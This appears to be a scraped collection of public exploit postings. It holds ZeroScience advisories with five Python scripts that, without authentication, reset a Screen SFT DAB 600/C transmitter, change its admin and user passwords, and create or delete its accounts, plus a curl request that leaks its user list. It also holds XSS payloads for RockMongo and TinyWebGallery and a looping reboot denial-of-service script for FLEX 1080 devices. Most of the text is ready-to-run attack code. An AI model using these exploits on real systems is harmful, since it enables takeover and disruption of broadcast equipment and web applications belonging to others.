<pre><code><br />Screen SFT DAB 600/C Unauthenticated Information Disclosure (userManager.cgx)<br /><br /><br />Vendor: DB Elettronica Telecomunicazioni SpA<br />Product web page: https://www.screen.it | https://www.dbbroadcast.com<br /> https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/<br />Affected version: Firmware: 1.9.3<br /> Bios firmware: 7.1 (Apr 19 2021)<br /> Gui: 2.46<br /> FPGA: 169.55<br /> uc: 6.15<br /><br />Summary: Screen's new radio DAB Transmitter is reaching the highest<br />technology level in both Digital Signal Processing and RF domain.<br />SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the<br />digital adaptive precorrection and configuatio flexibility, the Hot<br />Swap System technology, the compactness and the smart system design,<br />the SFT DAB are advanced transmitters. They support standards DAB,<br />DAB+ and T-DMB and are compatible with major headend brands.<br /><br />Desc: Screen is affected by an information disclosure vulnerability<br />due to improper access control enforcement. An unauthenticated remote<br />attacker can exploit this, via a specially crafted request to gain<br />access to sensitive information including usernames and source IP<br />addresses.<br /><br />Tested on: Keil-EWEB/2.1<br /> MontaVista® Linux® Carrier Grade eXpress (CGX)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5776<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5776.php<br /><br /><br />19.03.2023<br /><br />--<br /><br /><br />$ curl 'http://SFTDAB/system/api/userManager.cgx'<br />{"ssbtType":"userManager","ssbtIdx":0,"ssbtObj":{"admin":false,"users":[{"user":"testingus","type":"GUEST","connected":false,"info":null},{"user":"joxy","type":"OPERATOR","connected":false,"info":null},{"user":"dude","type":"OPERATOR","connected":true,"info":{"ip":"192.168.178.150","tmo":120}}]}}<br /></code></pre>
<pre><code>#!/usr/bin/env python3<br />#<br />#<br /># Screen SFT DAB 600/C Authentication Bypass Reset Board Config Exploit<br />#<br />#<br /># Vendor: DB Elettronica Telecomunicazioni SpA<br /># Product web page: https://www.screen.it | https://www.dbbroadcast.com<br /># https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/<br /># Affected version: Firmware: 1.9.3<br /># Bios firmware: 7.1 (Apr 19 2021)<br /># Gui: 2.46<br /># FPGA: 169.55<br /># uc: 6.15<br />#<br /># Summary: Screen's new radio DAB Transmitter is reaching the highest<br /># technology level in both Digital Signal Processing and RF domain.<br /># SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the<br /># digital adaptive precorrection and configuatio flexibility, the Hot<br /># Swap System technology, the compactness and the smart system design,<br /># the SFT DAB are advanced transmitters. They support standards DAB,<br /># DAB+ and T-DMB and are compatible with major headend brands.<br />#<br /># Desc: The application suffers from a weak session management that can<br /># allow an attacker on the same network to bypass these controls by reusing<br /># the same IP address assigned to the victim user (NAT) and exploit crucial<br /># operations on the device itself. By abusing the IP address property that<br /># is binded to the Session ID, one needs to await for such an established<br /># session and issue unauthorized requests to the vulnerable API to manage<br /># and/or manipulate the affected transmitter.<br />#<br /># Tested on: Keil-EWEB/2.1<br /># MontaVista® Linux® Carrier Grade eXpress (CGX)<br />#<br />#<br /># Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /># @zeroscience<br />#<br />#<br /># Advisory ID: ZSL-2023-5775<br /># Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5775.php<br />#<br />#<br /># 19.03.2023<br />#<br /><br />import hashlib,datetime##########<br />import requests,colorama#########<br />from colorama import Fore, Style#<br />colorama.init()<br />print(Fore.RED+Style.BRIGHT+<br /> '''<br />██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████ <br />██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██ <br />██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████ <br />██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ <br />██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██ <br /> '''<br /> +Style.RESET_ALL)<br />print(Fore.WHITE+Style.BRIGHT+<br /> '''<br /> ZSL and the Producers insist that no one<br /> submit any exploits of themselfs or others<br /> performing any dangerous activities.<br /> We will not open or view them.<br /> '''<br /> +Style.RESET_ALL)<br />s=datetime.datetime.now()<br />s=s.strftime('%d.%m.%Y %H:%M:%S')<br />print('Starting API XPL -',s)<br />t=input('Enter transmitter ip: ')<br />e='/system/api/deviceManagement.cgx'<br />print('Calling object: ssbtObj')<br />print('CGX fastcall: deviceManagement::reset')<br />t='http://'+t+e<br />bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',<br /> 'Accept':'application/json, text/plain, */*',<br /> 'Accept-Language':'ku-MK,en;q=0.9',<br /> 'Accept-Encoding':'gzip, deflate',<br /> 'User-Agent':'Dabber--',<br /> 'Connection':'close'}<br />j={'ssbtIdx':0,<br /> 'ssbtType':'deviceManagement',<br /> 'ssbtObj':{<br /> 'reset':'true'<br /> }<br /> }<br />r=requests.post(t,headers=bh,json=j)<br />if r.status_code==200:<br /> print('Done.')<br />else:<br /> print('Error')<br />exit(-1)<br /></code></pre>
<pre><code>#!/usr/bin/env python3<br />#<br />#<br /># Screen SFT DAB 600/C Authentication Bypass Admin Password Change Exploit<br />#<br />#<br /># Vendor: DB Elettronica Telecomunicazioni SpA<br /># Product web page: https://www.screen.it | https://www.dbbroadcast.com<br /># https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/<br /># Affected version: Firmware: 1.9.3<br /># Bios firmware: 7.1 (Apr 19 2021)<br /># Gui: 2.46<br /># FPGA: 169.55<br /># uc: 6.15<br />#<br /># Summary: Screen's new radio DAB Transmitter is reaching the highest<br /># technology level in both Digital Signal Processing and RF domain.<br /># SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the<br /># digital adaptive precorrection and configuatio flexibility, the Hot<br /># Swap System technology, the compactness and the smart system design,<br /># the SFT DAB are advanced transmitters. They support standards DAB,<br /># DAB+ and T-DMB and are compatible with major headend brands.<br />#<br /># Desc: This exploit circumvents the control and requirement of admin's<br /># old password and directly changes the password.<br />#<br /># Tested on: Keil-EWEB/2.1<br /># MontaVista® Linux® Carrier Grade eXpress (CGX)<br />#<br />#<br /># Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /># @zeroscience<br />#<br />#<br /># Advisory ID: ZSL-2023-5774<br /># Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5774.php<br />#<br />#<br /># 19.03.2023<br />#<br /><br />import hashlib,datetime##########<br />import requests,colorama#########<br />from colorama import Fore, Style#<br />colorama.init()<br />print(Fore.RED+Style.BRIGHT+<br /> '''<br />██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████ <br />██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██ <br />██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████ <br />██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ <br />██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██ <br /> '''<br /> +Style.RESET_ALL)<br />print(Fore.WHITE+Style.BRIGHT+<br /> '''<br /> ZSL and the Producers insist that no one<br /> submit any exploits of themselfs or others<br /> performing any dangerous activities.<br /> We will not open or view them.<br /> '''<br /> +Style.RESET_ALL)<br />s=datetime.datetime.now()<br />s=s.strftime('%d.%m.%Y %H:%M:%S')<br />print('Starting API XPL -',s)<br />t=input('Enter transmitter ip: ')<br />p=input('Enter desired password: ')<br />e='/system/api/userManager.cgx'<br />m5=hashlib.md5()<br />m5.update(p.encode('utf-8'))<br />h=m5.hexdigest()<br />print('Your sig:',h)<br />print('Calling object: ssbtObj')<br />print('CGX fastcall: userManager::changeUserPswd')<br />t='http://'+t+e<br />bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',<br /> 'Accept':'application/json, text/plain, */*',<br /> 'Accept-Language':'ku-MK,en;q=0.9',<br /> 'Accept-Encoding':'gzip, deflate',<br /> 'User-Agent':'Dabber-+',<br /> 'Connection':'close'}<br />j={'ssbtIdx':0,<br /> 'ssbtType':'userManager',<br /> 'ssbtObj':{<br /> 'changeUserPswd':{<br /> 'username':'admin',<br /> 'password':h<br /> }<br /> },<br /> }<br />r=requests.post(t,headers=bh,json=j)<br />if r.status_code==200:<br /> print('Done.')<br />else:<br /> print('Error')<br />exit(-2)<br /></code></pre>
<pre><code>#!/usr/bin/env python3<br />#<br />#<br /># Screen SFT DAB 600/C Authentication Bypass Erase Account Exploit<br />#<br />#<br /># Vendor: DB Elettronica Telecomunicazioni SpA<br /># Product web page: https://www.screen.it | https://www.dbbroadcast.com<br /># https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/<br /># Affected version: Firmware: 1.9.3<br /># Bios firmware: 7.1 (Apr 19 2021)<br /># Gui: 2.46<br /># FPGA: 169.55<br /># uc: 6.15<br />#<br /># Summary: Screen's new radio DAB Transmitter is reaching the highest<br /># technology level in both Digital Signal Processing and RF domain.<br /># SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the<br /># digital adaptive precorrection and configuatio flexibility, the Hot<br /># Swap System technology, the compactness and the smart system design,<br /># the SFT DAB are advanced transmitters. They support standards DAB,<br /># DAB+ and T-DMB and are compatible with major headend brands.<br />#<br /># Desc: The application suffers from a weak session management that can<br /># allow an attacker on the same network to bypass these controls by reusing<br /># the same IP address assigned to the victim user (NAT) and exploit crucial<br /># operations on the device itself. By abusing the IP address property that<br /># is binded to the Session ID, one needs to await for such an established<br /># session and issue unauthorized requests to the vulnerable API to manage<br /># and/or manipulate the affected transmitter.<br />#<br /># Tested on: Keil-EWEB/2.1<br /># MontaVista® Linux® Carrier Grade eXpress (CGX)<br />#<br />#<br /># Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /># @zeroscience<br />#<br />#<br /># Advisory ID: ZSL-2023-5773<br /># Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5773.php<br />#<br />#<br /># 19.03.2023<br />#<br /><br />import hashlib,datetime##########<br />import requests,colorama#########<br />from colorama import Fore, Style#<br />colorama.init()<br />print(Fore.RED+Style.BRIGHT+<br /> '''<br />██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████ <br />██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██ <br />██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████ <br />██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ <br />██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██ <br /> '''<br /> +Style.RESET_ALL)<br />print(Fore.WHITE+Style.BRIGHT+<br /> '''<br /> ZSL and the Producers insist that no one<br /> submit any exploits of themselfs or others<br /> performing any dangerous activities.<br /> We will not open or view them.<br /> '''<br /> +Style.RESET_ALL)<br />s=datetime.datetime.now()<br />s=s.strftime('%d.%m.%Y %H:%M:%S')<br />print('Starting API XPL -',s)<br />t=input('Enter transmitter ip: ')<br />u=input('Enter desired username: ')<br />e='/system/api/userManager.cgx'<br />print('Calling object: ssbtObj')<br />print('CGX fastcall: userManager::removeUser')<br />t='http://'+t+e<br />bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',<br /> 'Accept':'application/json, text/plain, */*',<br /> 'Accept-Language':'ku-MK,en;q=0.9',<br /> 'Accept-Encoding':'gzip, deflate',<br /> 'User-Agent':'Dabber-',<br /> 'Connection':'close'}<br />j={'ssbtIdx':0,<br /> 'ssbtType':'userManager',<br /> 'ssbtObj':{<br /> 'removeUser':u<br /> }<br /> }<br />r=requests.post(t,headers=bh,json=j)<br />if r.status_code==200:<br /> print('Done.')<br />else:<br /> print('Error')<br />exit(-3)<br /></code></pre>
<pre><code>#!/usr/bin/env python3<br />#<br />#<br /># Screen SFT DAB 600/C Authentication Bypass Password Change Exploit<br />#<br />#<br /># Vendor: DB Elettronica Telecomunicazioni SpA<br /># Product web page: https://www.screen.it | https://www.dbbroadcast.com<br /># https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/<br /># Affected version: Firmware: 1.9.3<br /># Bios firmware: 7.1 (Apr 19 2021)<br /># Gui: 2.46<br /># FPGA: 169.55<br /># uc: 6.15<br />#<br /># Summary: Screen's new radio DAB Transmitter is reaching the highest<br /># technology level in both Digital Signal Processing and RF domain.<br /># SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the<br /># digital adaptive precorrection and configuatio flexibility, the Hot<br /># Swap System technology, the compactness and the smart system design,<br /># the SFT DAB are advanced transmitters. They support standards DAB,<br /># DAB+ and T-DMB and are compatible with major headend brands.<br />#<br /># Desc: The application suffers from a weak session management that can<br /># allow an attacker on the same network to bypass these controls by reusing<br /># the same IP address assigned to the victim user (NAT) and exploit crucial<br /># operations on the device itself. By abusing the IP address property that<br /># is binded to the Session ID, one needs to await for such an established<br /># session and issue unauthorized requests to the vulnerable API to manage<br /># and/or manipulate the affected transmitter.<br />#<br /># Tested on: Keil-EWEB/2.1<br /># MontaVista® Linux® Carrier Grade eXpress (CGX)<br />#<br />#<br /># Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /># @zeroscience<br />#<br />#<br /># Advisory ID: ZSL-2023-5772<br /># Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5772.php<br />#<br />#<br /># 19.03.2023<br />#<br /><br />import hashlib,datetime##########<br />import requests,colorama#########<br />from colorama import Fore, Style#<br />colorama.init()<br />print(Fore.RED+Style.BRIGHT+<br /> '''<br />██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████ <br />██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██ <br />██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████ <br />██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ <br />██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██ <br /> '''<br /> +Style.RESET_ALL)<br />print(Fore.WHITE+Style.BRIGHT+<br /> '''<br /> ZSL and the Producers insist that no one<br /> submit any exploits of themselfs or others<br /> performing any dangerous activities.<br /> We will not open or view them.<br /> '''<br /> +Style.RESET_ALL)<br />s=datetime.datetime.now()<br />s=s.strftime('%d.%m.%Y %H:%M:%S')<br />print('Starting API XPL -',s)<br />t=input('Enter transmitter ip: ')<br />u=input('Enter desired username: ')<br />p=input('Enter desired password: ')<br />e='/system/api/userManager.cgx'<br />m5=hashlib.md5()<br />m5.update(p.encode('utf-8'))<br />h=m5.hexdigest()<br />print('Your sig:',h)<br />print('Calling object: ssbtObj')<br />print('CGX fastcall: userManager::changeUserPswd')<br />t='http://'+t+e<br />bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',<br /> 'Accept':'application/json, text/plain, */*',<br /> 'Accept-Language':'ku-MK,en;q=0.9',<br /> 'Accept-Encoding':'gzip, deflate',<br /> 'User-Agent':'Dabber+',<br /> 'Connection':'close'}<br />j={'ssbtIdx':0,<br /> 'ssbtType':'userManager',<br /> 'ssbtObj':{<br /> 'changeUserPswd':{<br /> 'username':u,<br /> 'password':h<br /> }<br /> },<br /> }<br />r=requests.post(t,headers=bh,json=j)<br />if r.status_code==200:<br /> print('Done.')<br />else:<br /> print('Error')<br />exit(-4)<br /></code></pre>
<pre><code>#!/usr/bin/env python3<br />#<br />#<br /># Screen SFT DAB 600/C Authentication Bypass Account Creation Exploit<br />#<br />#<br /># Vendor: DB Elettronica Telecomunicazioni SpA<br /># Product web page: https://www.screen.it | https://www.dbbroadcast.com<br /># https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/<br /># Affected version: Firmware: 1.9.3<br /># Bios firmware: 7.1 (Apr 19 2021)<br /># Gui: 2.46<br /># FPGA: 169.55<br /># uc: 6.15<br />#<br /># Summary: Screen's new radio DAB Transmitter is reaching the highest<br /># technology level in both Digital Signal Processing and RF domain.<br /># SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the<br /># digital adaptive precorrection and configuatio flexibility, the Hot<br /># Swap System technology, the compactness and the smart system design,<br /># the SFT DAB are advanced transmitters. They support standards DAB,<br /># DAB+ and T-DMB and are compatible with major headend brands.<br />#<br /># Desc: The application suffers from a weak session management that can<br /># allow an attacker on the same network to bypass these controls by reusing<br /># the same IP address assigned to the victim user (NAT) and exploit crucial<br /># operations on the device itself. By abusing the IP address property that<br /># is binded to the Session ID, one needs to await for such an established<br /># session and issue unauthorized requests to the vulnerable API to manage<br /># and/or manipulate the affected transmitter.<br />#<br /># Tested on: Keil-EWEB/2.1<br /># MontaVista® Linux® Carrier Grade eXpress (CGX)<br />#<br />#<br /># Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /># @zeroscience<br />#<br />#<br /># Advisory ID: ZSL-2023-5771<br /># Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5771.php<br />#<br />#<br /># 19.03.2023<br />#<br /><br />import hashlib,datetime##########<br />import requests,colorama#########<br />from colorama import Fore, Style#<br />colorama.init()<br />print(Fore.RED+Style.BRIGHT+<br /> '''<br />██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████ <br />██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██ <br />██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████ <br />██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ <br />██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██ <br /> '''<br /> +Style.RESET_ALL)<br />print(Fore.WHITE+Style.BRIGHT+<br /> '''<br /> ZSL and the Producers insist that no one<br /> submit any exploits of themselfs or others<br /> performing any dangerous activities.<br /> We will not open or view them.<br /> '''<br /> +Style.RESET_ALL)<br />s=datetime.datetime.now()<br />s=s.strftime('%d.%m.%Y %H:%M:%S')<br />print('Starting API XPL -',s)<br />t=input('Enter transmitter ip: ')<br />u=input('Enter desired username: ')<br />p=input('Enter desired password: ')<br />e='/system/api/userManager.cgx'<br />m5=hashlib.md5()<br />m5.update(p.encode('utf-8'))<br />h=m5.hexdigest()<br />print('Your sig:',h)<br />print('Calling object: ssbtObj')<br />print('CGX fastcall: userManager::newUser')<br />t='http://'+t+e<br />bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',<br /> 'Accept':'application/json, text/plain, */*',<br /> 'Accept-Language':'ku-MK,en;q=0.9',<br /> 'Accept-Encoding':'gzip, deflate',<br /> 'User-Agent':'Dabber++',<br /> 'Connection':'close'}<br />j={'ssbtIdx':0,<br /> 'ssbtType':'userManager',<br /> 'ssbtObj':{<br /> 'newUser':{<br /> 'password':h,<br /> 'type':'OPERATOR',<br /> 'username':u<br /> }<br /> },<br /> }<br />r=requests.post(t,headers=bh,json=j)<br />if r.status_code==200:<br /> print('Done.')<br />else:<br /> print('Error')<br />exit(-5)<br /></code></pre>
<pre><code># Exploit Title: RockMongo 1.1.7 - Stored Cross-Site Scripting (XSS)<br /># Discovery by: Rafael Pedrero<br /># Discovery Date: 2020-09-19<br /># Vendor Homepage: https://github.com/iwind/rockmongo/<br /># Software Link : https://github.com/iwind/rockmongo/<br /># Tested Version: 1.1.7<br /># Tested on: Windows 7 and 10<br /><br /># Vulnerability Type: Stored Cross-Site Scripting (XSS)<br /><br />CVSS v3: 6.5<br />CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br />CWE: CWE-79<br /><br />Vulnerability description: RockMongo v1.1.7, does not sufficiently encode<br />user-controlled inputs, resulting in a stored and reflected Cross-Site<br />Scripting (XSS) vulnerability via the index.php, in multiple parameter.<br /><br />Proof of concept:<br /><br />Stored:<br /><br />POST https://localhost/mongo/index.php?action=db.newCollection&db=local<br />HTTP/1.1<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)<br />Gecko/20100101 Firefox/70.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 69<br />Origin: https://localhost<br />Connection: keep-alive<br />Referer: https://localhost/mongo/index.php?action=db.newCollection&db=local<br />Cookie: PHPSESSID=jtjuid60sv6j3encp3cqqps3f7; ROCK_LANG=es_es;<br />rock_format=json<br />Upgrade-Insecure-Requests: 1<br />Host: localhost<br /><br />name=%09%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&size=0&max=0<br /><br />Reflected:<br /><br />https://localhost/mongo/index.php?action=collection.index&db=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&collection=startup_log<br /><br />https://localhost/mongo/index.php?action=collection.index&db=local&collection=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E<br /><br />https://localhost/mongo/index.php?action=db.index&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E<br /><br />http://localhost/mongo/index.php?db=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&collection=startup_log&action=collection.index&format=json&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll<br /><br />http://localhost/mongo/index.php?db=local&collection=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&action=collection.index&format=json&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll<br /><br />http://localhost/mongo/index.php?db=local&collection=startup_log&action=collection.index&format=%27+onMouseOver%3D%27alert%281%29%3B&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll<br /><br /><br />POST http://localhost/mongo/index.php?action=login.index&host=0 HTTP/1.1<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)<br />Gecko/20100101 Firefox/70.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 109<br />Origin: https://localhost<br />Authorization: Basic cm9vdDpyb290<br />Connection: keep-alive<br />Referer: https://localhost/mongo/index.php?action=login.index&host=0<br />Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1;<br />rock_format=json<br />Upgrade-Insecure-Requests: 1<br />Host: localhost<br /><br />more=0&host=0&username=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&password=****&db=&lang=es_es&expire=3<br /><br />POST http://localhost/mongo/index.php?action=server.command& HTTP/1.1<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)<br />Gecko/20100101 Firefox/70.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 109<br />Origin: https://localhost<br />Authorization: Basic cm9vdDpyb290<br />Connection: keep-alive<br />Referer: https://localhost/mongo/index.php?action=server.command&<br />Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1;<br />rock_format=json<br />Upgrade-Insecure-Requests: 1<br />Host: localhost<br /><br />command=%7B%0D%0A++listCommands%3A+1%0D%0A%7D&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&format=json<br /><br />POST http://localhost/mongo/index.php?action=server.execute& HTTP/1.1<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)<br />Gecko/20100101 Firefox/70.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 140<br />Origin: https://localhost<br />Authorization: Basic cm9vdDpyb290<br />Connection: keep-alive<br />Referer: https://localhost/mongo/index.php?action=server.execute&<br />Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1;<br />rock_format=json<br />Upgrade-Insecure-Requests: 1<br />Host: localhost<br /><br />code=function+%28%29+%7B%0D%0A+++var+plus+%3D+1+%2B+2%3B%0D%0A+++return+plus%3B%0D%0A%7D&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E<br /><br /><br /></code></pre>
<pre><code>#Exploit Title: TinyWebGallery v2.5 - Stored Cross-Site Scripting (XSS)<br />#Application: TinyWebGallery<br />#Version: v2.5<br />#Bugs: Stored Xss<br />#Technology: PHP<br />#Vendor URL: http://www.tinywebgallery.com/<br />#Software Link: https://www.tinywebgallery.com/download.php?tinywebgallery=latest<br />#Date of found: 07-05-2023<br />#Author: Mirabbas Ağalarov<br />#Tested on: Linux <br /><br />2. Technical Details & POC<br />========================================<br />steps: <br /><br />1. Login to account<br />2. Go to http://localhost/twg25/index.php?twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg<br />3. Edit <br />4. Set folder name section as <script>alert(4)</script><br /><br /><br /><br />Request :<br /><br /><br /><br />POST /twg25/i_frames/i_titel.php HTTP/1.1<br />Host: localhost<br />Content-Length: 264<br />Cache-Control: max-age=0<br />sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: iframe<br />Referer: http://localhost/twg25/i_frames/i_titel.php?twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=qc7mfbthpf7tnf32a34p8l766k<br />Connection: close<br /><br />twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg&twg_foffset=&twg_submit=true&twg_titel_page2=true&twg_foldername_mod=1&twg_foldername=%26lt%3Bscript%26gt%3Balert%284%29%26lt%3B%2Fscript%26gt%3B&twg_folderdesc_mod=1&twg_folderdesc=aaaaaaaaaaaaaaaaa&twg_submit=Save<br /><br /><br />5. Go to http://localhost/twg25/index.php<br /><br /><br /></code></pre>
<pre><code># Exploit Title: FLEX 1080 < 1085 Web 1.6.0 - Denial of Service<br /># Date: 2023-05-06<br /># Exploit Author: Mr Empy<br /># Vendor Homepage: https://www.tem.ind.br/<br /># Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94<br /># Version: 1.6.0<br /># Tested on: Android<br /># CVE ID: CVE-2022-2591<br />#!/usr/bin/env python3<br />import requests<br />import re<br />import argparse<br />from colorama import Fore<br />import time<br /><br />def main():<br /> def banner():<br /> print('''<br /> ________ _______ __<br /> / ____/ / / ____/ |/ /<br /> / /_ / / / __/ | /<br /> / __/ / /___/ /___ / |<br /> /_/ /_____/_____//_/|_|<br /><br />[FLEX 1080 < 1085 Web 1.6.0 - Denial of Service]<br /><br />''')<br /> def reboot():<br /> r = requests.get(f'http://{arguments.target}/sistema/flash/reboot')<br /> if 'Rebooting' in r.text:<br /> pass<br /> else:<br /> print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware<br />não é vulnerável')<br /> quit()<br /><br /> banner()<br /> print(f'{Fore.LIGHTBLUE_EX}[*] {Fore.LIGHTWHITE_EX} Iniciando o ataque')<br /> while True:<br /> try:<br /> reboot()<br /> print(f'{Fore.LIGHTGREEN_EX}[+] {Fore.LIGHTWHITE_EX} Hardware<br />derrubado com sucesso!')<br /> time.sleep(1)<br /> except:<br /># print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware<br />está inativo')<br /> pass<br /><br />if __name__ == '__main__':<br /> parser = argparse.ArgumentParser()<br /> parser.add_argument('-t','--target', action='store', help='Target',<br />dest='target', required=True)<br /> arguments = parser.parse_args()<br /> try:<br /> main()<br /> except KeyError:<br /> quit()<br /> <br /><br /></code></pre>
